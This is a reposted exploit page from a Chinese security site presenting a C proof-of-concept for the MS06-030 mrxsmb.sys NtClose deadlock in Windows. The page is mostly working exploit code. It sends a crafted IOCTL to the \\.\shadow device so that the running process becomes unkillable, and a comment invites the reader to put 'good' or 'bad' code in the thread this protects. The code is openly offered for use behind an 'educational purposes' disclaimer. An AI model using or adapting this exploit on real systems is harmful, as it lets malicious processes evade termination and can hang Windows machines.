首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030)
来源:http://www.reversemode.com 作者:ruben 发布时间:2006-06-14  

////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rubén Santamarta
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>


#define MAGIC_IOCTL 0x141047


VOID ShowError()
{
LPVOID lpMsgBuf;
FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
NULL,
GetLastError(),
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
(LPTSTR) &lpMsgBuf,
0,
NULL);
MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
exit(1);
}


VOID IamAlive()
{
DWORD i;

for(i=0;i<0x1000;i++)
{
Sleep(1000);
printf("\rI am a Thread and I am alive [%x]",i);
}

}


VOID KillMySelf()
{

DWORD junk;
DWORD *OutBuff;
DWORD *InBuff;
BOOL bResult;
HANDLE hDevice;
DWORD i;

hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL, OPEN_EXISTING, 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE) ShowError();

OutBuff=(DWORD*)malloc(0x18);
if(!OutBuff) ShowError();

OutBuff[3]=(DWORD)hDevice;

DeviceIoControl(hDevice,
MAGIC_IOCTL,
0,0,
OutBuff,0x18,
&junk,
(LPOVERLAPPED)NULL);
// MAIN THREAD ENDING.
}


int main(int argc, char *argv[])
{

LPTHREAD_START_ROUTINE GoodThread;
DWORD dwThreadId;
DWORD bResult;
GoodThread=(LPTHREAD_START_ROUTINE)IamAlive;

printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
printf("\t(Only for educational purposes)\n");
printf("..http://www.reversemode.com..\n\n");
printf("Launching Thread ...");

// PUT YOUR "GOOD" OR "BAD" CODE HERE
// e.g GoodThread
CreateThread(NULL,0,GoodThread,0,0,&dwThreadId);


printf("Done\n");
printf("I am going to dissapear,but I will be with you forever\n");
printf("(..)\n\n");
KillMySelf(); // Immortal mode "on" ;)

return(1);
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MyBulletinBoard (MyBB) < 1.
·MS Windows XP/2K (Mrxsmb.sys)
·CesarFTP 0.99g (MKD) Remote Bu
·CesarFTP 0.99g (MKD) Remote Bu
·blur6ex <= 0.3.462 (ID) Adm
·Pico Zip 4.01 (Long Filename)
·RCblog <= 1.03 (post) Remot
·bitweaver <= 1.3 (tmpImageP
·0verkill 0.16 (ASCII-ART Game)
·Mambo <= 4.6rc1 (Weblinks)
·Lanifex DMO <= 2.3b (_incMg
·FlashBB <= 1.1.5 (phpbb_roo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved